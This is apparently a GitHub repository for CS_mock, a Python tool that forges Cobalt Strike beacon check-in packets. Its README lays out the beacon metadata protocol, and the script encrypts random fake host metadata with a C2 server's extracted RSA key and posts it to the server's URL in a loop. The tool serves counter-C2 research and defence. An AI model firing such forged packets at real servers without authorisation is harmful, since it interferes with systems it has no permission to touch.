├── CSMOCK.png
├── README.md
└── cs_mock.py


/CSMOCK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/burpheart/CS_mock/f93e19f53e4fe31b4d74c6cb94989ce979b06846/CSMOCK.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CS_mock
 2 | 模拟cobalt strike beacon上线包.  Simulation cobalt strike beacon connection packet.
 3 | 
 4 | 拿到c2通信使用的RSA public key和提交metedata的url 即可模拟上线
 5 | 
 6 | Use the CobaltStrikeParser extract public key from the payload https://github.com/Sentinel-One/CobaltStrikeParser  parse_beacon_config.py payload_url --json
 7 | 
 8 | Remember to remove the extra padding from the public key
 9 | ![](CSMOCK.png)
10 | 
11 | 
12 | matadata 协议结构
13 | 
14 | ``` 
15 |         ┌─────────────────────────────────────────────────┐
16 |         │                      head                       │
17 |         ├──────────────────────────┬──────────────────────┤
18 |         │         4  Byte          │      4  Byte         │
19 |         ├──────────────────────────┼──────────────────────┤
20 |         │    magic 00 00 be ef     │     metadata_len     │
21 |         ├──────────────────────────┴──────────────────────┤
22 |         │                     metadata                    │
23 |         ├─────────────────────────────────────────────────┤
24 |         │                     16 Byte                     │
25 |         ├─────────────────────────────────────────────────┤
26 |         │                     aes_key                     │
27 |         ├────────┬────────┬────────┬───────┬──────┬───────┤
28 |         │ 2 byte │ 2 byte │ 4 byte │ 4 byte│2 byte│ 1 byte│
29 |         ├────────┼────────┼────────┼───────┼──────┼───────┤
30 |         │os_info1│os_info2│   id   │  pid  │ port │ flag  │
31 |         ├────────┼────────┼────────┼───────┼──────┼───────┤
32 |         │ 1 byte │ 1 byte │ 2 byte │ 4 byte│4 byte│4 byte │
33 |         ├────────┼────────┼────────┼───────┼──────┼───────┤
34 |         │ os_ver │os_ver_2│os_bulid│ ptr_1 │ptr_2 │ptr_3  │
35 |         ├────────┴────┬───┴────────┴───────┴──────┴───────┤
36 |         │   4 byte    │          TAB split TEXT           │
37 |         ├─────────────┼───────────────────────────────────┤
38 |         │inner_ip_addr│ computername username processname │
39 |         └─────────────┴───────────────────────────────────┘
40 | 
41 | ```
42 | 


--------------------------------------------------------------------------------
/cs_mock.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # coding=utf-8
 3 | import hexdump
 4 | import rsa
 5 | import random
 6 | import base64
 7 | import string
 8 | import urllib.request
 9 | for _ in range(10):
10 |     #pack = b'\x00\x00\xBE\xEF'  # pack head
11 |     #pack += b'\x00\x00\x00\x4C'  # pack len
12 |     pack = bytearray(random.getrandbits(4) for _ in range(16))  # AESKEY
13 |     pack += b'\xa8\x03'  # name charset  (int) (little)
14 |     pack += b'\xa8\x03'  # name charset  (int) (little)
15 |     # pack+=b'\x00\x00\x00\x06' # Beacon Id random
16 |     pack += random.randint(0 , 9999999) .to_bytes(4, 'big') # Beacon Id
17 |     pack += random.randint(0 , 65535) .to_bytes(4, 'big') # Beacon Pid
18 |     pack += b'\x00\x00'  # Beacon Port
19 |     pack += b'\x04'  # Beacon Flag 04
20 |     pack += b'\x06'
21 |     pack += b'\x02'
22 |     pack += b'\x23\xf0\x00\x00\x00\x00'  # windows version (int)
23 |     pack += b'\x76\x91'  # windows version_1 (int)
24 |     pack += b'\x0a\x60\x76\x90\xf5\x50'
25 |     pack += bytearray(random.getrandbits(4) for _ in range(4))  # Beacon Ip
26 |     #pack += b'\x4b\x4b'+b'\x09'+b'\x63\x63\x63'+b'\x09'+b'\x61'  # Beacon info split 0x09 computer_name user_name process_name
27 |     pack += bytes(''.join(random.sample(string.ascii_letters + string.digits, 6)), encoding = "utf8")+ b'\x09' + bytes(''.join(random.sample(string.ascii_letters + string.digits, 6)), encoding = "utf8") + b'\x09' + bytes(''.join(random.sample(string.ascii_letters + string.digits, 6)), encoding = "utf8")
28 |     pack = b'\x00\x00\xBE\xEF'+len(pack).to_bytes(4, 'big')+pack
29 |     url = 'http://192.168.234.100/pixel.gif' # C2 Server metadata post url (CobaltStrikeParser C2Server)
30 |     pubkey = rsa.PublicKey.load_pkcs1_openssl_pem("""
31 |     -----BEGIN PUBLIC KEY-----
32 |     MIGfXXXXXXXXXXXXXXXX==
33 |     -----END PUBLIC KEY-----
34 |     """)# use the CobaltStrikeParser extract public key from the payload https://github.com/Sentinel-One/CobaltStrikeParser  parse_beacon_config.py payload_url --json
35 |     #Remember to remove the extra padding from the public key
36 |     enpack = rsa.encrypt(pack, pubkey)
37 |     header = {
38 |         'Cookie': base64.b64encode(enpack).decode('utf-8')
39 |     }
40 |     request = urllib.request.Request(url, headers=header)
41 |     reponse = urllib.request.urlopen(request).read()
42 |     #print('base64:', base64.b64encode(enpack).decode('utf-8'))
43 |     #print(hexdump.hexdump(pack))
44 | 


--------------------------------------------------------------------------------